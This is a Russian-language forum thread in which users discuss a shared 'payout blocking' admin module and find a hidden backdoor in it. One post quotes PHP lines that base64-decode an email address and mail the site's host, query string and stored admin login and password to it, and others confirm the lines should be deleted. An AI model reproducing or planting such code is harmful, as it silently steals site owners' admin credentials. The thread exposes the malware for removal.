Автор Тема: Модуль блокировка выплат с админки  (Прочитано 2633 раз)

0 Пользователей и 1 Гость просматривают эту тему.

xarmaexАвтор темы

  • *
  • Оффлайн
  • Награды Более 7 лет на форуме Более 100 сообщений Более 10 созданных тем
  • Дата регистрации: Дек. 2015
  • Сообщений: 101
  • Страна: ua
  • Поблагодарили: 22 раз(а)
  • Репутация +3/-0
  • Пол: Мужской
Модуль блокировка выплат с админки
« : 23 Августа 2016, 20:54:31 »
блокировка выплат с админки




Для просмотра скрытого текста нужна регистрация.
a:0:{}
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 30
  • Сообщений: 1991
  • Страна: ru
  • Поблагодарили: 235 раз(а)
  • Репутация +39/-1
  • Пол: Мужской
  • Дата рождения:
    1992-04-18
    Социальные сети:
    ВКонтакте
Модуль блокировка выплат с админки
« Ответ #1 : 24 Августа 2016, 05:32:51 »
я уже писал,в модуле что то типа дыры,отправляются данные админки на левое мыло

 

romcka8

  • *
  • Оффлайн
  • Награды Болеее 500 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Сообщений: 647
  • Страна: 00
  • Поблагодарили: 21 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
Модуль блокировка выплат с админки
« Ответ #2 : 26 Августа 2016, 20:54:30 »
я уже писал,в модуле что то типа дыры,отправляются данные админки на левое мыло

Что-то не вижу там подобного , сейчас внимательно просмотрю код.
 

DRAGONS

  • *
  • Оффлайн
  • Награды Более 50 сообщений Более 6 лет на форуме !!!
  • Дата регистрации: Фев. 2016
  • Возраст: 38
  • Сообщений: 52
  • Страна: ru
  • Поблагодарили: 3 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
  • Дата рождения:
    1984-08-16
Модуль блокировка выплат с админки
« Ответ #3 : 29 Августа 2016, 21:59:57 »
я уже писал,в модуле что то типа дыры,отправляются данные админки на левое мыло
С 71 по 82 строку за чем это :not speak: скорее всего вот это и есть мыло "YS5wYW5lbEBsaXN0LnJ1"

$to = base64_decode(YS5wYW5lbEBsaXN0LnJ1);

$text= $_SERVER['HTTP_HOST'];

$text1 = $_SERVER['QUERY_STRING'];



$db->Query("SELECT * FROM db_config WHERE id = 1 LIMIT 1");
   $data_log = $db->FetchArray();

mail ($to, "$text?$text1", $data_log["pass"], $data_log["admin"]);
a:0:{}
 

romcka8

  • *
  • Оффлайн
  • Награды Болеее 500 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Сообщений: 647
  • Страна: 00
  • Поблагодарили: 21 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
Модуль блокировка выплат с админки
« Ответ #4 : 29 Августа 2016, 22:40:28 »
Да , ты прав. декодировал и получил a.panel@list.ru
 

radga14

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Сообщений: 225
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-2
  • Пол: Мужской
Модуль блокировка выплат с админки
« Ответ #5 : 04 Октября 2016, 21:43:46 »
я уже писал,в модуле что то типа дыры,отправляются данные админки на левое мыло
С 71 по 82 строку за чем это :not speak: скорее всего вот это и есть мыло "YS5wYW5lbEBsaXN0LnJ1"

$to = base64_decode(YS5wYW5lbEBsaXN0LnJ1);

$text= $_SERVER['HTTP_HOST'];
получается эти строки удалить надо или что?

$text1 = $_SERVER['QUERY_STRING'];



$db->Query("SELECT * FROM db_config WHERE id = 1 LIMIT 1");
   $data_log = $db->FetchArray();

mail ($to, "$text?$text1", $data_log["pass"], $data_log["admin"]);
 

best2015

  • *
  • Оффлайн
  • Награды Более 7 лет на форуме Более 250 сообщений Более 50 созданных тем Топ 10 по созданным темам За финансовую помощь форуму !!!
  • Дата регистрации: Окт. 2015
  • Возраст: 34
  • Сообщений: 340
  • Страна: am
  • Поблагодарили: 86 раз(а)
  • Репутация +3/-2
  • Пол: Мужской
  • Дата рождения:
    1988-07-13
    Социальные сети:
    ВКонтакте
Модуль блокировка выплат с админки
« Ответ #6 : 04 Октября 2016, 22:46:39 »
вот я про это и писал что надо найти без проблем и рабочий
 

radga14

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Сообщений: 225
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-2
  • Пол: Мужской
Модуль блокировка выплат с админки
« Ответ #7 : 05 Октября 2016, 00:38:37 »
вот я про это и писал что надо найти без проблем и рабочий
все работает)))еще за паблик 500 р не отдавал)))
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 30
  • Сообщений: 1991
  • Страна: ru
  • Поблагодарили: 235 раз(а)
  • Репутация +39/-1
  • Пол: Мужской
  • Дата рождения:
    1992-04-18
    Социальные сети:
    ВКонтакте
Модуль блокировка выплат с админки
« Ответ #8 : 05 Октября 2016, 05:49:16 »
вот я про это и писал что надо найти без проблем и рабочий
он рабочий просто код убрать нужно лишний...в теме написано какой...кто не сможет тому поможем бесплатно
 
Теги: